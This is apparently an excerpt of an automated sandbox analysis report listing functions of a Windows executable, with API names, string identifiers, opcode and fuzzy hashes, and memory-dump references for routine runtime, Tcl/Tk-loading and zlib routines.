                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                                                            • Instruction ID: b0a664d22002de4b3525d03edf901b5746a1fc20be997a07d62db38b0e35b271
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c51c900cc97cfaa1f2463de7ded10a88eb35566439d91f89b12c497efef6b613
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE0EC90F0C267E2FA14BAE849C26B9151A9FA4350F405030D9088A383DD1C78959721
                                                                                                                                                                                                                                                            Function 00007FF6404FDEA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,00000000,00007FF6404FA63A,?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A), ref: 00007FF6404FDEFD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                                            • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                                                            • Instruction ID: 98a5e7f098b90d778abbfa37ea9d07980415a81a17a3c59796a0e34c29b73baf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACF06D15B0D667E0FE58B66259553B9329B9F98B40F488430C90ECA3C2DE2CE4818320
                                                                                                                                                                                                                                                            Function 00007FF6404FC90C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(?,?,?,00007FF6404EFFB0,?,?,?,00007FF6404F161A,?,?,?,?,?,00007FF6404F2E09), ref: 00007FF6404FC94A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4292702814-0
                                                                                                                                                                                                                                                            • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                            • Instruction ID: f521ba59cfb01d67be82970a1102318cebdaaca2b8441e20f092a82f209aff6b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36F01251F2D267E5FE5876B15A51BB9128A9F84774F084630DD3EC53C1DEACA5418310

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 00007FF6404E6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                            • API String ID: 190572456-3427451314
                                                                                                                                                                                                                                                            • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                            • Instruction ID: abbbf6ab425959a4ee5db86c0e07891b53cc1cfff00ffca5121d5a0f11402665
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE1766890DB63F0FA5DFB14BA541B833A5EF1A798F845435C82E823A4EF3CA548C351
                                                                                                                                                                                                                                                            Function 00007FF6405033BC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                            • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                            • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                                                                                                                                            • Instruction ID: b25be81cb71a796bf97b59b4ad97dce53ffa0d27d58ae6af5e4c5acef20fd6bd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4B2F4B2E1C2A29BE728AF64D6407FD37A5FB5538CF405135DA2997B85DF38A900CB40
                                                                                                                                                                                                                                                            Function 00007FF6404E9FCD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                                                                            • API String ID: 0-2665694366
                                                                                                                                                                                                                                                            • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                                                                                                                                            • Instruction ID: 8577d0c187cc32b90f294497aebb14f984045c58d530ed39e0b28acbf9fc0b19
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F52B272A186B69BD794EF14C458A7E3BA9FB84340F154139EA4A877C0DF3DE944CB80
                                                                                                                                                                                                                                                            Function 00007FF6404EC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                                            • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                            • Instruction ID: 3ec315774e2e966e507582b769b1e8d3e34b39d51ed6993d7d51d750dfd109b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC314C7661CB9296EB64EF60E8903EE7360FB85748F04443ADA4E87B99DF38D548C710
                                                                                                                                                                                                                                                            Function 00007FF6404E29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                                                            • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                                                            • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                                                            • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                                                            • Instruction ID: 254e0af54bfeede140830f3e6c79a011187cf6447a103088df4033657765c7e9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B21517260CAA192F724FB10F5506DA7364FB89788F400136EADD93B98DF7CD5468B40
                                                                                                                                                                                                                                                            Function 00007FF6404F9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                                                            • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                                                            • Instruction ID: 3891df918236542e21a933cb94d5bbda2276a66832b62c853e2cb9478c37822d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7231B43661CF9295EB64EF25E8802AE33A4FB89758F540135EA9D83B98DF3CC545CB00
                                                                                                                                                                                                                                                            Function 00007FF640500B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                                                            • Opcode ID: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                                                            • Instruction ID: 37b713b53cc68f08942d79398f14ce3f1865504be49422b01fcfef59d1de5146
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe4d16d24a501c342f9bdefd2dbf7b3c8df5536519bece05b709b84cd6c1ed58
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BB1D522B1C6A291EA68BB61D6101BD6395FB46BECF446131EE6D97BC5DF3CE841C300
                                                                                                                                                                                                                                                            Function 00007FF6404EC330 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                                            • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                                                            • Instruction ID: d03305e209f12da7931db38f9328676fcaee51668232bcff120ac439f25be5d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39114826B18B169AEB00EF60E9442AC33A4FB59758F040E31DE2D86BA4DF78D1988340
                                                                                                                                                                                                                                                            Function 00007FF640502F20 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpy_s
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1502251526-0
                                                                                                                                                                                                                                                            • Opcode ID: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                                                                                            • Instruction ID: cd5727578f247cf2275260863d85fa31ef83c92fd3adcf9b8135b3dfca9dabe0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b41cb84a548d2e61bdeb7bb10330278f5fecde395d7a0ce6ff99175555b28b3c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 84C12672B1D69697D728EF19A2886AEB795F789788F408135DB5E83744DF3DE800CB00
                                                                                                                                                                                                                                                            Function 00007FF6404E979B Relevance: 4.1, Strings: 3, Instructions: 397COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                            • API String ID: 0-1127688429
                                                                                                                                                                                                                                                            • Opcode ID: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                                                                                                                                                                            • Instruction ID: b68cc838592034025f94e81283f4ab3eaa476e32aa06f693e99a7dd1df610f58
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a55f11302ef793728786adf415505d571280719f8ef56880a9f0a37636d8ec0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18F17D62A1C3E59BE7A5FB19C088A3A3AA9FF45740F055538EA4D877D1CF78E940C780
                                                                                                                                                                                                                                                            Function 00007FF640508A38 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                                                                            • Opcode ID: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                                                                                                                                                                            • Instruction ID: 7ec5fa7cdb195189e5f1731c9442ec5abb57e49ccd5d6461e00cde3653f0a6d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4367feba8b0fb5a89db2d79700bffb7903d016d74ce2a4ac284103265cf95646
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17B14C73608B998AEB19EF29C54676C3BA0F745B4CF188921DEAD877A4CF39D851C700
